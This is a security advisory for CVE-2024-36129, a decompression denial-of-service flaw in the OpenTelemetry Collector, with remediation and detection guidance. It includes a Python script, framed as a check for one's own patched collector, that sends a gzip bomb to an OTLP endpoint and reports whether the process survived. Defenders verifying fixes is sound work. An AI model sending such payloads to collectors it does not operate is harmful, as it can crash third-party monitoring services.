CVE-2024-36129

8.2 HIGH

📋 TL;DR

CVE-2024-36129 is an unsafe decompression vulnerability in OpenTelemetry Collector: the shared HTTP and gRPC server code (confighttp and configgrpc) inflated compressed request bodies without bounding the decompressed size, so a small, highly compressible payload expands to far more memory than the request-size limits were meant to allow and the process runs out of memory. An unauthenticated attacker who can reach a receiver can crash the service (denial of service). Every deployment on a vulnerable version that accepts compressed data over HTTP or gRPC is affected, which for OTLP receivers is the default. The vulnerability is fixed in version 0.102.1.

💻 Affected Systems

Products:
  • OpenTelemetry Collector
Versions: All versions before 0.102.1
Operating Systems: All platforms running OpenTelemetry Collector
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerable when the collector accepts compressed data via HTTP or gRPC endpoints. The bug lives in the shared server modules, confighttp before 0.102.0 and configgrpc before 0.102.1, so every HTTP and gRPC receiver built on them (OTLP included) and any distribution or custom build that vendors those modules is affected.

📦 What is this software?

OpenTelemetry Collector is a vendor-neutral service that receives, processes and exports telemetry (traces, metrics, logs). It is typically deployed as an agent or gateway listening for OTLP over gRPC and HTTP, often on network paths reachable by many producers, which is why an unauthenticated crash on the receive path matters.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete service outage of OpenTelemetry Collector leading to loss of telemetry data collection and potential cascading failures in monitoring systems.

🟠

Likely Case

Service crashes and restarts, causing gaps in telemetry data collection and potential alerting failures.

🟢

If Mitigated

Minimal impact with proper network segmentation and rate limiting preventing exploitation attempts.

🌐 Internet-Facing: HIGH - Unauthenticated attackers can exploit this remotely without any credentials.
🏢 Internal Only: MEDIUM - Internal attackers or compromised systems could still exploit this, but requires network access.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The vulnerability is straightforward to exploit by sending specially crafted compressed payloads to vulnerable endpoints.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 0.102.1

Vendor Advisory: https://github.com/open-telemetry/opentelemetry-collector/security/advisories/GHSA-c74f-6mfw-mm4v

Restart Required: Yes

Instructions:

1. Update OpenTelemetry Collector to version 0.102.1 or later (for custom builds, update confighttp to 0.102.0+ and configgrpc to 0.102.1+).
2. Review the receiver size limits that the fixed versions apply to the decompressed data: max_request_body_size on HTTP receivers (confighttp default 20 MiB) and the corresponding max_recv_msg_size_mib on gRPC receivers. Lower them if your producers never send large batches.
3. Restart all collector instances (agents, gateways, sidecars).
4. Verify with otelcol --version (or the name of your distribution's binary) that every instance reports 0.102.1 or later.

🔧 Temporary Workarounds

Reject compressed input in front of the receiver

all

Receivers decompress whatever the sender declares in Content-Encoding (HTTP) or grpc-encoding (gRPC). The 'compression' key is an exporter (client) setting and does not make a receiver refuse compressed bodies, so vulnerable versions have no receiver-side switch for this

Put the receiver behind a reverse proxy or ingress that drops requests carrying a Content-Encoding or grpc-encoding header, and set 'compression: none' on your own exporters so legitimate traffic still gets through uncompressed

Network segmentation

all

Restrict access to collector endpoints to trusted sources only; the receive path is unauthenticated, so reachability is the entire attack surface

Use firewall rules to limit access to collector ports (OTLP gRPC 4317, OTLP HTTP 4318, and the legacy 55680/55681 if still enabled)

🧯 If You Can't Patch

  • Implement strict network access controls to limit who can send data to collectors
  • Deploy rate limiting at network or application level to prevent exploitation attempts
  • Run the collector with an explicit memory limit (cgroup or container resources) and an automatic restart policy, so an oversized payload takes down one process rather than the host, and alert on restarts so the telemetry gap is noticed

🔍 How to Verify

Check if Vulnerable:

Check the OpenTelemetry Collector version: anything below 0.102.1 is vulnerable. Distributions (otelcol-contrib, vendor builds) follow the same version numbers; for a custom build, check go.mod for confighttp < 0.102.0 or configgrpc < 0.102.1.

Check Version:

otelcol --version

Verify Fix Applied:

Verify that every instance reports 0.102.1 or higher, then confirm the behaviour on a collector you operate: a compressed request whose decompressed size exceeds the receiver limit must be refused with an error response without the process growing by the inflated size, and the collector must keep serving afterwards.
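A check for the "Verify Fix Applied" step above, written as an added example (it is not code from the OpenTelemetry project or from this page). It builds a small gzip body that inflates to 64 MiB, well past the 20 MiB that confighttp applies by default as max_request_body_size, POSTs it to an OTLP/HTTP traces endpoint with Content-Encoding: gzip, and reports how the collector answered, whether it is still reachable, and, if you pass the collector's own metrics URL, how much its resident set grew. The /v1/traces path, the :8888 metrics port and the otelcol_process_memory_rss metric name are assumptions to adjust for your deployment. Run it only against a collector you operate.

```python
#!/usr/bin/env python3
"""Post-patch check for CVE-2024-36129 against a collector you operate.

Added example, not OpenTelemetry project code.  Assumed: the OTLP/HTTP
receiver takes gzip bodies at /v1/traces, its limit is confighttp's
max_request_body_size (default 20 MiB), and the collector's Prometheus
text metrics on :8888 expose RSS as otelcol_process_memory_rss*.
"""
import gzip
import sys
import urllib.error
import urllib.request

GZIP_HEADERS = {
    "Content-Type": "application/x-protobuf",
    "Content-Encoding": "gzip",
}


def build_gzip_body(decompressed_size: int) -> bytes:
    """gzip stream that inflates to `decompressed_size` zero bytes.

    Zeros compress at roughly 1000:1, so 64 MiB decompressed is ~64 KiB on
    the wire.  A bounded decompressor stops at the limit; an unbounded one
    allocates all 64 MiB before noticing the bytes are not a protobuf.
    """
    return gzip.compress(b"\x00" * decompressed_size, compresslevel=9)


def inflated_length(body: bytes) -> int:
    """Decompressed size of a gzip body (sanity check on the payload)."""
    return len(gzip.decompress(body))


def classify(status, error) -> str:
    """Verdict for one request.

    rejected     4xx: the receiver refused the body.  A fixed collector does
                 this after reading only up to its limit; an unpatched one
                 may also answer 4xx (zeros are not a valid message) but only
                 after inflating everything, which the RSS delta reveals.
    accepted     2xx: the whole decompressed body was consumed.
    server_error 5xx: inconclusive.
    unreachable  no HTTP reply: after a successful earlier probe this
                 usually means the process died.
    """
    if error is not None or status is None:
        return "unreachable"
    if 200 <= status < 300:
        return "accepted"
    if 400 <= status < 500:
        return "rejected"
    return "server_error"


def rss_bytes(metrics_text: str):
    """Pull the process RSS sample out of Prometheus text exposition."""
    for line in metrics_text.splitlines():
        if line.startswith("otelcol_process_memory_rss"):
            return float(line.rsplit(" ", 1)[1])
    return None


def http_post(url: str, body: bytes, timeout: float):
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers=GZIP_HEADERS)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, None
    except urllib.error.HTTPError as exc:  # 4xx/5xx surface here
        return exc.code, None
    except (urllib.error.URLError, OSError) as exc:
        return None, exc


def current_rss(metrics_url, timeout: float):
    """RSS from the metrics endpoint, or None if unset or unreachable."""
    if not metrics_url:
        return None
    try:
        with urllib.request.urlopen(metrics_url, timeout=timeout) as resp:
            return rss_bytes(resp.read().decode("utf-8", "replace"))
    except (urllib.error.URLError, OSError):
        return None


def probe(traces_url: str, decompressed_size: int,
          metrics_url=None, timeout: float = 10.0) -> dict:
    """Send one oversized compressed request and collect the evidence."""
    before = current_rss(metrics_url, timeout)
    body = build_gzip_body(decompressed_size)
    status, error = http_post(traces_url, body, timeout)
    after = current_rss(metrics_url, timeout)
    delta = after - before if before is not None and after is not None else None
    return {"wire_bytes": len(body), "decompressed_bytes": decompressed_size,
            "status": status, "verdict": classify(status, error),
            "rss_before": before, "rss_after": after, "rss_delta": delta}


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit("usage: check_36129.py http://HOST:4318/v1/traces "
                 "[http://HOST:8888/metrics]")
    # 64 MiB clears the 20 MiB default by a wide margin without being
    # enough to endanger an unpatched instance you are only probing.
    result = probe(sys.argv[1], 64 * 1024 * 1024,
                   sys.argv[2] if len(sys.argv) > 2 else None)
    for key, value in result.items():
        print(f"{key}: {value}")
```

On a fixed collector expect verdict rejected with an rss_delta that is a small fraction of decompressed_bytes; an rss_delta in the tens of megabytes means the body was fully inflated before the error, which is the vulnerable behaviour. A verdict of unreachable on a host that answered a moment earlier means the process went down, so check its logs and restart count before probing again.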

📡 Detection & Monitoring

Log Indicators:

  • Collector process crashes or restarts, including container OOMKilled events (exit code 137) on collector pods
  • Memory usage spikes (for example in the collector's own otelcol_process_memory_rss metric) followed by crashes
  • Errors related to decompression or memory allocation, including the Go runtime's "fatal error: runtime: out of memory" in the collector log

Network Indicators:

  • Compressed requests (Content-Encoding or grpc-encoding set) from unexpected sources that precede a memory spike; the malicious payload is small on the wire, so byte counts alone will not flag it
  • Multiple rapid connection attempts to collector ports

SIEM Query:

source="otel-collector" AND ("panic" OR "out of memory" OR "decompression failed")

🔗 References

  • GHSA-c74f-6mfw-mm4v: https://github.com/open-telemetry/opentelemetry-collector/security/advisories/GHSA-c74f-6mfw-mm4v
